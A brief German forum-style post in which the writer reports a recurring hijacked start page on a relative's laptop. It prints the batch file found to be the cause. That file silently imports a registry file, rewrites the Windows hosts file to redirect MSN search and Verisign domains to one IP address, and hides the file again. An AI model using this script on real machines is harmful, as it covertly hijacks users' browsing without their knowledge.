Beim NoteBook meines Ex-Schwiegervaters

kam immer wieder die Startseite hp.htm auf, abgelegt unter c:\windows.
Habe dann folgende batch-Datei gefunden, die dies beinhaltete.
War Tricky dies zu finden !!!
@echo off
if exist c:\windows\hp.htm goto act
copy c:\windows\odbs.log c:\windows\hp.htm > nul
goto act
:act
regedit /s srch.reg > nul
attrib -h -s -r c:\windows\system32\drivers\etc\hosts > nul
echo 206.161.200.105 auto.search.msn.com > c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder-idn.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105
http://www.your.com/ >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 your.com >> c:\windows\system32\drivers\etc\hosts
echo #To disable your family filter just delete all the following lines: >> c:\windows\system32\drivers\etc\hosts
attrib +h +s +r c:\windows\system32\drivers\etc\hosts > nul
exit